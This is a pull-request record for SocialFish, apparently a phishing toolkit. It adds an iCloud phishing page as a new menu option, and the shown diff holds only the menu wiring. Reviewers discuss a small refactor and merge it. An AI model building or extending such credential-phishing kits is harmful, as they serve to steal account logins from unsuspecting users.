### PR TITLE
icloud added

### PR DESCRIPTION
**Pull request by usama7628674**

### CODE REVIEW

**Comment by usama7628674** [comment]
@alexmozzhakov @An0nUD4Y Please squash and then merge it.

**Comment by usama7628674** [comment]
Took me a lot of time to make this page.

File: SocialFish.py [hunk 1]
```diff
@@ -268,6 +270,10 @@ def runPEnv():
         loadModule('VK')
         option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
         runPhishing('VK', option2)
+    elif option == '15':
+        loadModule('iCloud')
+        option2 = ''
```
Comment (alexmozzhakov) [inline SocialFish.py]: Yeah, I know, it's been there for a while, but why don't we set `option2` to be `''` as a default parameter value in `runPhishing()`

Comment (usama7628674) [reply SocialFish.py]: I'll fix all those 404s.

Comment (usama7628674) [reply SocialFish.py]: @alexmozzhakov Fixed now.

**Comment by alexmozzhakov** [comment]
@usama7628674 great, it works fine, I will refactor to use default parameter value myself.

**Pull request merged**